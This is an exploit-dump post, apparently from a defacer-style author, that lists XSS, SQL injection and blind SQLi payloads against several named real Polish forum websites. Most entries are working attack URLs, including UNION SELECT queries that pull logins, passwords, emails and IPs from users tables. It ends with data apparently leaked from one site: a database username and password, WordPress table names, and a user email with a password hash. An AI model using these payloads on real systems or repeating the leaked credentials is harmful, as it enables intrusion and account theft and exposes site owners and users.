.__ .__ .__ __
____ __ __| | | | _____|__|/ |_ ____
/ \| | \ | | | / ___/ \ __\/ __ \
| | \ | / |_| |__\___ \| || | \ ___/
|___| /____/|____/____/____ >__||__| \___ >
\/ \/ \/nullsite.alterivsta.org
#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => ???
#Dork => ???*
#CMS => unknows forums,phpbb,invision power board
#Vulnz => XSS/Blind SQLi/SQLi
#Date => 14/04/2023
*PoC*
[code]
----------------------------------------------------------------------------#1
www.sportowyvulcan.pl/forum.php?sort=a%'>">\> | <=[*XSS*]
-------------------------------------------------------------------------------#2
http://www.duchmaszyny.pl/forum.php?sel=4%'>">\> | <=[*XSS*]
-------------------------------------------------------------------------------
.............................................................................................................#3
http://www.hudak.pl/forum.php?akcja=czytaj&id=-9756 union all select 1,2,login,pass,5,6,7,8,9 FROM users-- |
http://www.hudak.pl/forum.php?akcja=czytaj&id=-9756 union all select 1,2,login,passwd,5,6,7,8,9 FROM z_user--| <=[*SQLi*]
http://www.hudak.pl/forum.php?akcja=czytaj&id=-9756 union all select 1,2,email,ip,5,6,7,8,9 FROM forum-- |
.............................................................................................................|
_________________________________________________________________________________________________________________#4
https://www.psychologia.net.pl/forum.php?level=467187&post=467187&sortuj='>\>">0&cale= | <=[*XSS*]
_________________________________________________________________________________________________________________|
________ ___ ___ ________ ________ ________
|\ __ \|\ \|\ \|\ __ \|\ __ \|\ __ \
\ \ \|\ \ \ \\\ \ \ \|\ \ \ \|\ /\ \ \|\ /_
\ \ ____\ \ __ \ \ ____\ \ __ \ \ __ \
\ \ \___|\ \ \ \ \ \ \___|\ \ \|\ \ \ \|\ \
\ \__\ \ \__\ \__\ \__\ \ \_______\ \_______\
\|__| \|__|\|__|\|__| \|_______|\|_______|Special
__________________________________________________#5
#Dork: Powered by PhPBB © 2001, 2002 phpBB Group* |______________________________________________
https://www.toczen.pl/forum/viewtopic.php?t=3294&start=-90 ;phpbb 2001/2002 unknow??? | <=[*SQLi*]
-------------------------------------------------------------------------------------------------
___ ________ ________
|\ \|\ __ \|\ __ \
\ \ \ \ \|\ \ \ \|\ /_
\ \ \ \ ____\ \ __ \
\ \ \ \ \___|\ \ \|\ \
\ \__\ \__\ \ \_______\
\|__|\|__| \|_______|Special
______________________________________________________________________________#6
https://www.maluchy.pl/forum/index.php?showtopic=98393*'*&st=20&gopid=9236485 | <= [*Blind SQLi*] ;Powered By IP.Board
------------------------------------------------------------------------------
#error:|
-------------------------------------------------------------------------------------------------------------------------------------------??
IPB WARNING [2] mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given (Line: 444 of /sources/classes/class_display.php) |
IPB WARNING [2] mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given (Line: 460 of /sources/classes/class_display.php) |
--------------------------------------------------------------------------------------------------------------------------------------------
___________________________________________________#7
http://m.www.siatkowka.wrzesnia.pl/forum.php?id=-1 | <= [*Blind SQLi*]
___________________________________________________|
----------------------------------------------------------------------------------#8
.first register account |
http://travel4u.pl/forum_nowy_temat.php? | | <= [*Persistent XSS*]
parameter "Temat" is bugged! insert -> '>">\> and post! |
----------------------------------------------------------------------------------
#Extra [*SQLi*] =>
-------------------------------------------------------------------------------------------------------------------------------------------------------
https://neurologia-dziecieca.pl/nd00.php?id=186 union all select 1,2,3,4,login,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM users-- |
-------------------------------------------------------------------------------------------------------------------------------------------------------
#DB name 1 => ptnd_ptnd |
user:ic033uc |
password:uqu04d |
------------------------
......................
#DB name 2 => ptnd_wp |
......................
#tables: |
------------------------------------------------------------------------------------
wp_commentmeta |
wp_comments |
wp_links |
wp_options |
wp_postmeta |
wp_posts |
wp_term_relationships |
wp_term_taxonomy |
wp_termmeta |
wp_terms |
wp_usermeta |
wp_users => #Extrapolated: msow@wp.plmarek-ptnd$P$BLf1j7Tnpe9zR2AjSSmjLkRn3RJyiZ0 |
------------------------------------------------------------------------------------
[/code]
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*